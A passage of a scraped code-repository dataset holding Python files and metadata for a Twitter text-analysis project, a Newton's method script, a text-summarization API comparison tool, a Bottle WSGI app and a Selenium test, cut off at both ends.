'cat', 'the']\n expect = ['taco', 'cat']\n result = self.object.filter_stopwords(test)\n self.assertListEqual(result, expect)" }, { "alpha_fraction": 0.5550661087036133, "alphanum_fraction": 0.5560826659202576, "avg_line_length": 35.432098388671875, "blob_id": "bbbbf318141134fa46777556ed8db9836196113e", "content_id": "e55fc568120522af1f433b51dd13da3d5b29001f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2951, "license_type": "permissive", "max_line_length": 124, "num_lines": 81, "path": "/ConstantsAndUtilities.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "import string\n\n\nclass Ignore(object):\n \"\"\"\n This contains all the terms to be ignored from hashtags etc. It is inherited by other classes which do cleaning\n \n Attributes:\n words: Dictionary with categories of irrelevant terms as keys (placenames, smallwords, socialmediaterms, irrelevant)\n fragments: String fragments which should be filterd out\n \"\"\"\n fragments = [\"'s\", \"amp\", '...', '//t.co', \"'re'\", \"'m\"]\n punctuation = string.punctuation\n words = {\n 'placenames' : ['tn', 'nashville', 'memphis', 'tennessee', 'knoxville', 'fl', 'tx', 'sc', 'nc', 'co', \n 'nyc', 'va', 'ga', 'twittoma', 'team243'],\n 'smallwords' : ['no', 'be', 'my', 'the', 'like', 'in', 'i', 'a', 'you', 'is', 'of', 'and', 'it', 'to',\n 'this', 'so', 'for', 'on', 'up'], \n 'socialmediaterms' : ['hashtag', 'selfie', 'repost', 'nofilter', 'instagram', 'instamood', 'instalike',\n 'instadaily', 'picoftheday', 'photo', 'instapic', 'http', 'rt', 'mt'],\n 'irrelevant' : ['recordstoreday', 'vinyl', 'naruto', 'bread' ]\n }\n\n def __init__(self):\n self.words = Ignore.words\n wordlist = []\n [wordlist.append(word) for k in Ignore.words.keys() for word in Ignore.words[k]]\n # [wordlist.append(w) for w in wl for wl in self.words.values()]\n self.wordtuple = tuple(wordlist)\n\n\n @staticmethod\n def iterable(self):\n \"\"\"\n Iterable object for all the contents of the ignore list\n TODO Make a generator \n \"\"\"\n wordlist = []\n [wordlist.append(word) for k in words.keys() for word in words[k]]\n # [wordlist.append(w) for w in wl for wl in Ignore.words.values()]\n return wordlist\n\n def generator(self):\n \"\"\"\n Generator which returns ignore words\n \"\"\"\n pass\n # (word for word in self.wordtuple)\n # yield word\n\n\n @staticmethod\n def get_list(self):\n \"\"\"\n Returns a list of everything to ignore\n \"\"\"\n wordlist = []\n [wordlist.append(w) for wl in self.words.values() for w in wl]\n wordlist += self.fragments\n wordlist += self.punctuation\n return wordlist\n \n \nclass Merge(object):\n \"\"\"\n This holds terms which are to be merged together in analyzing graphs\n \n Attributes:\n toMerge: Dictionary with the master term as key and values to be merged in list as values\n \"\"\"\n toMerge = {\n 'Fibromyalgia' : ['fibro', 'fibromyalgia', 'fms', 'fm'],\n 'CRPS' : ['crps', 'rsd'], \n 'ChronicFatigue' : ['chronicfatigue', 'chronicfatiguesyndrome', 'cfs', 'mecfs', 'cfsme', 'cfids', \n 'myalgicencephalomyelitis', 'mcs' ], \n 'RheumatoidArthritis' : ['rheumatoid', 'ra', 'rheumatoidarthritis'],\n 'Endometriosis' : ['endometriosis', 'endo']\n }\n\nif __name__ == '__main__':\n pass\n" }, { "alpha_fraction": 0.6059828996658325, "alphanum_fraction": 0.6059828996658325, "avg_line_length": 21.960784912109375, "blob_id": "4c0d30c4de846db05e1a82622a2a8f2c0ed8e8f9", "content_id": "23f888d2b90fdab8f632ade7a0049d1d33ef5f08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1170, "license_type": "permissive", "max_line_length": 64, "num_lines": 51, "path": "/TweetDAOs.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "\"\"\"\nThis contains classes for loading tweet data\n\nTHIS SHOULD INSTEAD USE THE DAO IN TwitterMining\n\"\"\"\n\nimport DAO\n\n\nclass TwitterSQLDAO(DAO.BaseDAO):\n \"\"\"\n Base database abstraction layer for twitter mysql database\n \"\"\"\n\n def __init__(self, test=False, local=True):\n if test is False:\n databaseName = 'twitter_data'\n else:\n databaseName = 'twitter_dataTEST'\n DAO.BaseDAO.__init__(self)\n if local is False:\n self.connectRemote(databaseName)\n else:\n self.connect(databaseName)\n\n\nclass TweetTextGetter(TwitterSQLDAO):\n \"\"\"\n Loads all tweetids and tweettext\n \n Args:\n test: Whether to use the test db\n local: Whether to use the local or remote db\n \n Returns:\n List of dictionaries with keys tweetID and tweetText\n \"\"\"\n\n def __init__(self, test=False, local=True):\n TwitterSQLDAO.__init__(self, test=test, local=local)\n\n\n def load_tweets(self):\n self.query = \"\"\"SELECT tweetID, tweetText FROM tweets\"\"\"\n self.val = []\n self.returnAll()\n return list(self.results)\n\n\nif __name__ == '__main__':\n pass" }, { "alpha_fraction": 0.5942720770835876, "alphanum_fraction": 0.5990453362464905, "avg_line_length": 19.950000762939453, "blob_id": "9f9d9ef35a699a1cb0528048f40a1f140679182d", "content_id": "b32f53076f5fcb97747c2662cb71e2bd92225ef5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "permissive", "max_line_length": 42, "num_lines": 20, "path": "/tests/test_ConstantsAndUtilities.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "__author__ = 'adam'\n\nimport unittest\nfrom ConstantsAndUtilities import *\n\n\nclass IgnoreTest(unittest.TestCase):\n def setUp(self):\n self.object = Ignore()\n\n def test_generator(self):\n pass\n # # expect = Ignore.words[0][0]\n # expect = 'recordstoreday'\n # result = self.object.generator()\n # self.assertEqual(expect, result)\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.5718811750411987, "alphanum_fraction": 0.5817821621894836, "avg_line_length": 32.66222381591797, "blob_id": "217351c5334bd3ef1085aceaee6e5c6e5ecf958f", "content_id": "b0808a07e207b9c63847aa59439c1edef224d81e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7575, "license_type": "permissive", "max_line_length": 127, "num_lines": 225, "path": "/TextAnalysis/TextTools.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "\nimport nltk\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nimport time\n\n#Used for WordFilters\nfrom ConstantsAndUtilities import Ignore\nimport string\n\nfrom OptimizationTools import *\n\nclass ProcessingError(Exception):\n def __init__(self, identifier):\n self.identifier = identifier\n def __repr__(self):\n return \"%s went bad on %s : %s\" % (self.kind, self.identifier_type, self.identifier)\n\nclass TweetProcessingError(ProcessingError):\n def __init__(self, tweetID):\n self.kind = 'TweetProcessing'\n self.identifier_type = 'tweetID'\n ProcessingError.__init__(self, tweetID)\n\nclass StringProcessingError(ProcessingError):\n def __init__(self, string_processed):\n self.kind = 'StringProcessing'\n self.identifier_type = 'String content'\n ProcessingError.__init__(self, string_processed)\n\n\nclass TweetTextWordBagMaker(object):\n \"\"\"\n This takes a list of dictionaries containing tweetID and tweetText and processes the texts for bag of words type analyses.\n \n Before running the process command, all lists of strings to ignore should be loaded using add_to_ignorelist()\n \n \n Attributes:\n masterbag: List containing all words\n ignore: Tuple of strings to ignore through filtering\n tweet_tuples: List containing tuples with the structure (tweetID, [list of words in tweet])\n \"\"\"\n def __init__(self):\n self.ignore = ()\n self.masterbag = [] #This will hold all words\n self.tweet_tuples = []\n \n def add_to_ignorelist(self, list_to_ignore):\n \"\"\"\n Add a list of strings to the internally held tuple of strings to ignore in processing text\n \n Args:\n list_to_ignore: List of strings to ignore.\n \"\"\"\n self.ignore = list(self.ignore)\n [self.ignore.append(i) for i in list_to_ignore]\n self.ignore = set(self.ignore)\n self.ignore = tuple(self.ignore)\n \n def process(self, list_of_dicts):\n \"\"\"\n Processes the tweet texts\n Most recent execution time 599.286342144 sec for 732683 tweets\n Moved stopwords filtration first: 891.928412914 for 732683 tweets\n Merged stopwords into ignore list: 234.204810858 \n 1 loops, best of 3: 14min 56s per loop\n TODO: Change order of execution for optimization\n \n Args:\n list_of_dicts: List of dictionaries with keys tweetID and tweetText\n \"\"\"\n for t in list_of_dicts:\n tweetid = t['tweetID']\n #process text\n words = self._make_wordbag(t['tweetText'])\n #words = self._filter_stopwords(words)\n words = self._filter_ignored_terms(words)\n words = self._filter_usernames(words)\n words = self._filter_urls(words)\n #process tuple\n tweet_tuple = (tweetid, words)\n self.tweet_tuples.append(tweet_tuple)\n self.masterbag += words\n \n def new_process(self, list_of_dicts):\n \"\"\"\n Best time 225.85651803\n \"\"\"\n for t in list_of_dicts:\n tweetid = t['tweetID']\n #process text\n words = self._make_wordbag(t['tweetText'])\n words = [w for w in words if self._check_unwanted(w) and w not in self.ignore ]\n #process tuple\n tweet_tuple = (tweetid, words)\n self.tweet_tuples.append(tweet_tuple)\n self.masterbag += words\n \n def OLDprocess(self, list_of_dicts): \n for t in list(self.results):\n tweetid = t['tweetID']\n #process text\n words = [word for sent in sent_tokenize(t['tweetText']) for word in word_tokenize(sent)]\n words = [w.lower() for w in words]\n words = [w for w in words if w not in Ignore.punctuation]#remove punctuation\n words = [w for w in words if w not in Ignore.fragments]#remove fragments\n words = [w for w in words if w[0] != '@']#Get rid of usernames\n words = [w for w in words if w[0:6] != '//t.co'] #Remove some urls\n words = [w for w in words if w not in Ignore.words['socialmediaterms']] #Remove terms from social media\n words = [w for w in words if w not in nltk.corpus.stopwords.words('english')] #Remove stopwords\n #process tuple\n tweet_tuple = (tweetid, words)\n self.tweet_tuples.append(tweet_tuple)\n self.masterbag += words\n \n def _make_wordbag(self, text):\n \"\"\"\n Takes a bunch of sentences and extracts all the words, makes them lowercase, and returns them in a list\n \n Args:\n text: String text to be word tokenized\n \n Returns:\n List of words, all lower case\n \"\"\"\n bag = [word.lower() for sent in sent_tokenize(text) for word in word_tokenize(sent)]\n return bag\n\n def _filter_ignored_terms(self, wordlist):\n \"\"\"\n Remove items that are in the ignore list\n \n Args:\n wordlist: List of strings to be filtered\n \n Returns:\n Filtered list\n \"\"\"\n if len(self.ignore) == 0:\n pass\n # TODO Raise error message\n #raise\n words = [w for w in wordlist if w not in self.ignore]\n return words\n \n def _check_unwanted(self, word):\n if word[0] != '@' and word[0:6] != '//t.co':\n return True\n else:\n return False\n \n def _filter_usernames(self, wordlist):\n \"\"\"\n Gets rid of usernames by recognizing the @\n TODO: Modify to recognize cases of .@username\n \n \"\"\"\n words = [w for w in wordlist if w[0] != '@']\n return words\n \n def _filter_urls(self, wordlist):\n \"\"\"\n Removes some urls\n TODO: Make this better\n \n Args:\n wordlist: List of strings to be filtered\n \n Returns:\n Filtered list\n \"\"\"\n words = [w for w in wordlist if w[0:6] != '//t.co']\n return words\n \n\n\nclass WordFilters(object):\n \"\"\"\n This has filters for removing various strings and string components.\n \n \"\"\"\n \n @staticmethod\n def remove_fragments(wordlist):\n \"\"\"\n Filters string fragments from the list and returns the filtered list\n \n Args:\n wordlist: A list of words to have fragments removed from\n \n Returns:\n The filtered list\n \"\"\"\n wordlist = [w for w in wordlist if w not in Ignore.fragments]#remove fragments\n return wordlist\n\n @staticmethod \n def remove_punctuation(wordlist):\n \"\"\"\n Filters out punctuation from input list. Does not filter at the word level (e.g., will not remove the period in \"cat.\")\n \n Args:\n wordlist: A list of strings to be filtered for list items which are punctuation marks. \n \n Returns:\n The filtered list\n \"\"\"\n wordlist = [w for w in wordlist if w not in string.punctuation]#remove punctuation\n return wordlist\n \n @staticmethod\n def filter_stopwords(wordlist):\n \"\"\"\n Uses NLTK English stopwords corpus to remove stopwords.\n \n Args:\n wordlist: List of strings to be filtered\n \n Returns:\n Filtered list\n \"\"\"\n words = [w for w in wordlist if w not in nltk.corpus.stopwords.words('english')]\n return words\n\nif __name__ == '__main__':\n pass\n" } ]
5
bryand1/textsummarization
https://github.com/bryand1/textsummarization
2c6057d89fc5e21deeff8fe63b90deaaa71e49fb
db22bebb5ee20eb9f35da19eb1baabf2e35a53b0
6a9e84af14cc2485830ad8cb80ee455c2eb253b0
refs/heads/master
2022-12-16T05:58:37.469921
2018-05-03T18:26:56
2018-05-03T18:26:56
132,033,886
1
1
null
2018-05-03T18:21:09
2019-08-09T11:43:54
2022-12-08T00:01:14
Python
[ { "alpha_fraction": 0.7527114748954773, "alphanum_fraction": 0.7527114748954773, "avg_line_length": 26.117647171020508, "blob_id": "2f03d7dbab6fa0a25239bd674fb363c646927fc3", "content_id": "c88bf7b4644d3173c456f817be2fcacb84028ed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 72, "num_lines": 17, "path": "/util.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import config\nimport logging\nimport sys\nimport time\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n logger.setLevel(config.LOGLEVEL)\n formatter = logging.Formatter(config.LOGFMT, datefmt=config.DATEFMT)\n formatter.converter = time.gmtime\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(config.LOGLEVEL)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n" }, { "alpha_fraction": 0.5921908617019653, "alphanum_fraction": 0.5965293049812317, "avg_line_length": 28.74193572998047, "blob_id": "63e208c7c4d23cfc9f127e7e300f6b8e0f4bf932", "content_id": "7994945ed738fd77cce4e22ebd621563608a5809", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1844, "license_type": "no_license", "max_line_length": 89, "num_lines": 62, "path": "/main.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSee and compare the output of popular extractive summarization APIs.\n@author Bryan Andrade <[email protected]>\n@version v0.0.1\n\nAPIs tested\n1. TextAnalysis Text Summarization\n2. SMMRY\n\nUsage: python3 main.py [--api textsummarization | smmry]\n\nArgs:\n--api Choose which API to test. Default is to run all APIs\n\"\"\"\nimport api\nimport argparse\nimport config\nimport os\nimport util\n\nlogger = util.get_logger(\"main\")\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser()\n p.add_argument('--api', type=str)\n cmdargs = p.parse_args()\n # If cmdargs.api is None, user intends to run all summary APIs\n article = 'uber-vs-lyft.txt'\n with open(os.path.join(config.WD, 'article', article)) as fh:\n text = fh.read()\n logger.info(\"Loaded article %s\", article)\n # TextAnalysis Text Summarization API\n if cmdargs.api == 'textsummarization' or cmdargs.api is None:\n args = (\n config.TEXTSUMMARIZATION_URL,\n config.X_MASHAPE_KEY,\n config.SENTNUM,\n text\n )\n resp = api.textsummarization.summarize(*args)\n js = resp.json()\n output = []\n for i, sentence in enumerate(js['sentences']):\n output.append(f\"{i + 1}: {sentence}\")\n with open(os.path.join(config.WD, 'output', 'textsummarization.txt'), 'w') as fh:\n fh.write('\\n'.join(output))\n logger.info(\"textsummarization done\")\n\n # SMMRY\n if cmdargs.api == 'smmry' or cmdargs.api is None:\n args = (\n config.SMMRY_URL,\n config.SMMRY_KEY,\n config.SENTNUM,\n text\n )\n resp = api.smmry.summarize(*args)\n js = resp.json()\n with open(os.path.join(config.WD, 'output', 'smmry.txt'), 'w') as fh:\n fh.write(js['sm_api_content'])\n logger.info(\"smmry done\")\n" }, { "alpha_fraction": 0.6462196707725525, "alphanum_fraction": 0.6462196707725525, "avg_line_length": 27.040000915527344, "blob_id": "21bbeeaf49e5e1828111000a3c73b875fcdf95bd", "content_id": "10bfe75d4c907898c4efb43812bc0894e748f55a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 701, "license_type": "no_license", "max_line_length": 71, "num_lines": 25, "path": "/api/textsummarization.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef summarize(api_endpoint, api_key, num_sentences, text_to_summarize):\n \"\"\"\n TextAnalysis Text Summarization API - provided by Mashape\n :param api_endpoint: string url\n :param api_key: string credential\n :param text_to_summarize: plain text article\n :param num_sentences: int of size of the summary\n :return: requests.Response\n \"\"\"\n headers = {\n 'X-Mashape-Key': api_key,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'\n }\n\n data = {\n 'sentnum': num_sentences,\n 'text': text_to_summarize\n }\n\n resp = requests.post(api_endpoint, headers=headers, data=data)\n return resp\n" }, { "alpha_fraction": 0.7066380977630615, "alphanum_fraction": 0.7109207510948181, "avg_line_length": 28.1875, "blob_id": "d6f9b14a36890b5182b8841404cb4273c4936256", "content_id": "22bd4ad91538367cfa31e8aa2b17f2782ee496ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 100, "num_lines": 16, "path": "/config.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import os\nimport logging\n\nWD = os.path.dirname(os.path.abspath(__file__))\n\nLOGLEVEL = logging.INFO\nLOGFMT = \"%(asctime)s %(name)s %(levelname)s %(message)s\"\nDATEFMT = \"%Y-%m-%d %H:%M:%S\"\n\nX_MASHAPE_KEY = os.environ.get('X_MASHAPE_KEY')\n\nTEXTSUMMARIZATION_URL = 'https://textanalysis-text-summarization.p.mashape.com/text-summarizer-text'\nSMMRY_URL = 'https://api.smmry.com'\nSMMRY_KEY = os.environ.get('SMMRY_KEY')\n# Number of sentences in summary output\nSENTNUM = 10\n" }, { "alpha_fraction": 0.6612021923065186, "alphanum_fraction": 0.6612021923065186, "avg_line_length": 31.294116973876953, "blob_id": "b37f6234a1c784165e26c13079ceb9a7c47e71ee", "content_id": "2859d991cd3b5bb4f046fbfd9451be5826d7d2ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 71, "num_lines": 17, "path": "/api/smmry.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef summarize(api_endpoint, api_key, num_sentences, text_to_summarize):\n \"\"\"\n SMMRY - text summarization API\n :param api_endpoint: string url\n :param api_key: string credential\n :param text_to_summarize: plain text article\n :param num_sentences: int of size of the summary\n :return: requests.Response\n \"\"\"\n url = \"{}/?SM_API_KEY={}&SM_LENGTH={}\".format(\n api_endpoint, api_key, num_sentences)\n data = {'sm_api_input': text_to_summarize}\n resp = requests.post(url, data=data)\n return resp\n" }, { "alpha_fraction": 0.7235862016677856, "alphanum_fraction": 0.7263448238372803, "avg_line_length": 36.76041793823242, "blob_id": "bf1bd1456246e73bc1f1590aca15cb3db477ca69", "content_id": "c062db06db1de2ac6546f9aee41d1e903a1dfd4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3625, "license_type": "no_license", "max_line_length": 570, "num_lines": 96, "path": "/README.md", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "# Text Summarization Comparison\n\n### Objective\n\nSee and compare the output of popular extractive summarization APIs.\n\n### Getting started\n\n```bash\ngit clone https://github.com/bryand1/textsummarization.git\ncd textsummarization\npip3 install -r requirements.txt\ntouch apikeys.env\n# Edit apikeys.env with your API keys\n# export X_MASHAPE_KEY=[YOUR KEY]\n# export SMMRY_KEY=[YOUR KEY]\nbash run.sh\n```\n\n### APIs Tested\n\n+ [TextAnalysis Text Summarization](https://market.mashape.com/textanalysis/text-summarization)\n+ [SMMRY](https://smmry.com/)\n\n#### Text Summarization\n\n```python\n# request format\n# These code snippets use an open-source library. http://unirest.io/python\nresponse = unirest.post(\"https://textanalysis-text-summarization.p.mashape.com/text-summarizer-text\",\n headers={\n \"X-Mashape-Key\": \"[ENTER KEY HERE]\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"\n },\n params={\n \"sentnum\": 5,\n \"text\": \"Automatic summarization is the process of reducing a text document with a computer program in order to create a summary that retains the most important points of the original document. As the problem of information overload has grown, and as the quantity of data has increased, so has interest in automatic summarization. Technologies that can make a coherent summary take into account variables such as length, writing style and syntax. An example of the use of summarization technology is search engines such as Google. Document summarization is another.\"\n }\n)\n```\n\nText Summarization returns a JSON response.\n\n```javascript\n{\n \"sentences\": [\n \"Text of sentence #1...\",\n \"Text of sentence #2...\",\n // etc.\n ]\n}\n```\n\n#### SMMRY\n\nExcerpts from [SMMRY API documentation](https://smmry.com/api)\n\nThe API request must be made to https://api.smmry.com. The returned response will be encoded in JSON.\n\nHere are the possible parameters placed in the request URL.\n \n+ SM\\_API\\_KEY=N Required, your API key.\n+ SM\\_URL=X Optional, the webpage to summarize.\n+ SM\\_LENGTH=N Optional, the number of sentences returned, default 7.\n+ SM\\_KEYWORD_COUNT=N Optional, N the number of keywords to return.\n+ SM\\_WITH\\_BREAK Optional, inserts the string [BREAK] between sentences.\n+ SM\\_WITH\\_ENCODE Optional, converts HTML entities to their applicable chars.\n+ SM\\_IGNORE\\_LENGTH Optional, returns summary regardless of quality or length.\n+ SM\\_QUOTE\\_AVOID Optional, sentences with quotations will be excluded.\n+ SM\\_QUESTION\\_AVOID Optional, sentences with question will be excluded.\n+ SM\\_EXCLAMATION\\_AVOID Optional, sentences with exclamation marks will be excluded.\n\nHere are the possible indexes of the array returned in a JSON array.\n \n+ sm\\_api\\_message Contains notices, warnings, and error messages.\n+ sm\\_api\\_character_count Contains the amount of characters returned.\n+ sm\\_api\\_title Contains the title when available.\n+ sm\\_api\\_content Contains the summary.\n+ sm\\_api\\_keyword\\_array Contains top ranked keywords in descending order.\n+ sm\\_api\\_error Contains error code.\n\n```php\n$text = \"Your long text goes here...\";\n\n$ch = curl_init(\"http://api.smmry.com/&SM_API_KEY=X\");\ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(\"Expect:\")); // See Note\ncurl_setopt($ch, CURLOPT_POST, true); \ncurl_setopt($ch, CURLOPT_POSTFIELDS, \"sm_api_input=\".$text);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);\ncurl_setopt($ch, CURLOPT_TIMEOUT, 20);\n$return = json_decode(curl_exec($ch), true);\ncurl_close($ch);\n```\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 25, "blob_id": "b1a02d58dbfbb8dd7827a68cbb032453f77f2b6a", "content_id": "50ba5f571383f5956abdba89e9ecb97e4b419888", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/api/__init__.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "from . import smmry\nfrom . import textsummarization\n" }, { "alpha_fraction": 0.3921568691730499, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 13.714285850524902, "blob_id": "0eeac963ac580cddadaf7c12c9dc8d4c6475f8cf", "content_id": "38b3f0049daf19d739d0b40d9e814d5cc6a4a6c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 102, "license_type": "no_license", "max_line_length": 18, "num_lines": 7, "path": "/requirements.txt", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "attrs==17.4.0\ncertifi==2017.4.17\nchardet==3.0.3\nidna==2.5\nrequests==2.17.3\nsix==1.11.0\nurllib3==1.21.1" } ]
8
kiradegraw/testRemoteRepo
https://github.com/kiradegraw/testRemoteRepo
037c9f7e09ba2fceab4ff401b7142bbd44ff2f5a
5be45d9a6e2db3487a1e4dffa660dcccd21868f5
d7f1a90afdf2b85ab9566e21776a06088c8b27ba
refs/heads/master
2023-07-27T23:31:12.013112
2021-09-07T23:29:56
2021-09-07T23:29:56
404,149,810
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5218855142593384, "alphanum_fraction": 0.5412458181381226, "avg_line_length": 18.393442153930664, "blob_id": "19293bd2a7deaabd65409900dc3a5c2ec7159123", "content_id": "be30b54a297e5221a3ec5b7b15cd00363a3dbfac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 78, "num_lines": 61, "path": "/newtons_method.py", "repo_name": "kiradegraw/testRemoteRepo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n\nimport sys\n\nfrom typing import (Callable)\nimport typing\nfrom fractions import (Fraction)\n\n\nEPSILON = 10e-6\nMAX_ITERATIONS = 100\n\ndef newtons_method(f, df, x_n, eps=EPSILON):\n\n n = 0\n\n next_x_n = x_n + 1000 * eps\n while abs(x_n - next_x_n) > eps:\n x_n = next_x_n\n next_x_n = x_n - (f(x_n) / df(x_n))\n\n if n >= MAX_ITERATIONS:\n break\n\n n += 1\n\n return x_n\n\n\ndef main():\n try:\n initial_guess = float(sys.argv[1])\n\n except IndexError as error:\n print(\"Usage: {0} initial_guess\".format(*sys.argv))\n sys.exit(1)\n\n except ValueError as error:\n print(\"ERROR {0} is not a valid number\".format(*sys.argv))\n print(\" \" + str(error))\n sys.exit(2)\n\n # Function (f) and its derivative (dx)\n def f(x):\n return (x ** 2) - 1\n\n def df(x):\n return 2 * x\n\n try:\n solution_newton = newtons_method(f, df, initial_guess)\n fx_newton = f(solution_newton)\n\n print(\"x = {:.4f} | f(x) = {:.4f}\".format(solution_newton, fx_newton))\n\n except ZeroDivisionError as error:\n print(str(error))\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n" } ]
1
CaViJun/pregnancy
https://github.com/CaViJun/pregnancy
051b45973528edcc9275114152d61244333f647d
72a872093c585cb0495a583d31638d4b0a068dcf
6202827680c46e2f7561b2cebb8b414b6433b541
refs/heads/master
2020-05-16T23:41:24.728922
2015-04-15T04:57:05
2015-04-15T04:57:05
28,946,347
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7903929948806763, "alphanum_fraction": 0.7903929948806763, "avg_line_length": 75, "blob_id": "e6581b50f6babf5ac9fae737dd8da528280d0128", "content_id": "9b726f1c3f61c1f3ac32c3a51315a527d9d4d781", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 229, "license_type": "no_license", "max_line_length": 137, "num_lines": 3, "path": "/README.md", "repo_name": "CaViJun/pregnancy", "src_encoding": "UTF-8", "text": "# pregnancy\nA little web app to show the pregnancy procedure. Set the date pregnant,then it compute the birthday,also show how many days,weeks passed\nand left. In fact it appears in two ways:Python web app, Python command line. \n" }, { "alpha_fraction": 0.5689922571182251, "alphanum_fraction": 0.5937984585762024, "avg_line_length": 22.88888931274414, "blob_id": "a098c5085548e76e7954fd05fe6a0a353fa4931d", "content_id": "6b1415da564839f63be851183e2cad6f21009d22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 645, "license_type": "no_license", "max_line_length": 148, "num_lines": 27, "path": "/wsgi.py", "repo_name": "CaViJun/pregnancy", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom bottle import static_file\n\ndef application(environ,start_response):\n if environ['PATH_INFO'] == '/favicon.ico':\n return static_file('favicon.ico',root='./')\n \n data = '''\n<head>\n<style>\nbody{\nmargin: 0px;\n}\n</style>\n</head>\n<body>\n<iframe border=\"0\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" width=\"100%\" height=\"100%\" src=\"http://man.jcloud.com/appengine/jae/hello.html\">\n</iframe>\n</body>\n</html>\n'''\n start_response(\"200 OK\",[\n (\"Content-Type\",\"text/html;charset=utf-8\"),\n (\"Content-Length\",str(len(data)))\n ])\n return iter([data])\n#improvement\n" } ]
2
akshatha206/selenium
https://github.com/akshatha206/selenium
d51eb585f4b0b15f60b970c505c1d1413b7cdda1
bdc58fac984bda5587eaf987f18547ec5bc62abd
3758a465fe74308fdff77be545573b2e434bc69c
refs/heads/main
2023-04-21T07:33:43.777647
2021-05-16T15:43:16
2021-05-16T15:43:16
367,869,419
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7281947135925293, "alphanum_fraction": 0.7281947135925293, "avg_line_length": 23.649999618530273, "blob_id": "e04cd97aa8634c4bfd29c9c6c1b3d35f874fbc13", "content_id": "d9f58a15c3e056cd215491b8fcbb21f93fc4d0f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 986, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/selenium.py", "repo_name": "akshatha206/selenium", "src_encoding": "UTF-8", "text": "import selenium\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n# inherit TestCase Class and create a new test class\nclass PythonOrgSearch(unittest.TestCase):\n\n\t# initialization of webdriver\n\tdef setUp(self):\n\t\tself.driver = webdriver.Firefox()\n\n\t# Test case method. It should always start with test_\n\tdef test_search_in_python_org(self):\n\t\t\n\t\t# get driver\n\t\tdriver = self.driver\n\t\t# get python.org using selenium\n\t\tdriver.get(\"https://www.google.com/\")\n\n\t\t# assertion to confirm if title has python keyword in it\n\t\tself.assertIn(\"google\", driver.title)\n\n\t\t# locate element using name\n\t\telem = driver.find_element_by_name(\"q\")\n\n\t\t# send data\n\t\telem.send_keys(\"hello world\")\n\n\t\t# recieve data\n\t\telem.send_keys(Keys.RETURN)\n\t\tassert \"No results found.\" not in driver.page_source\n\n\t# cleanup method called after every test performed\n\tdef tearDown(self):\n\t\tself.driver.close()\n\n# execute the script\nif __name__ == \"__main__\":\n\tunittest.main()\n" }, { "alpha_fraction": 0.6643564105033875, "alphanum_fraction": 0.6683168411254883, "avg_line_length": 41.04166793823242, "blob_id": "8dc3d445059e4751b888ebc6b1bace5fb9e24e33", "content_id": 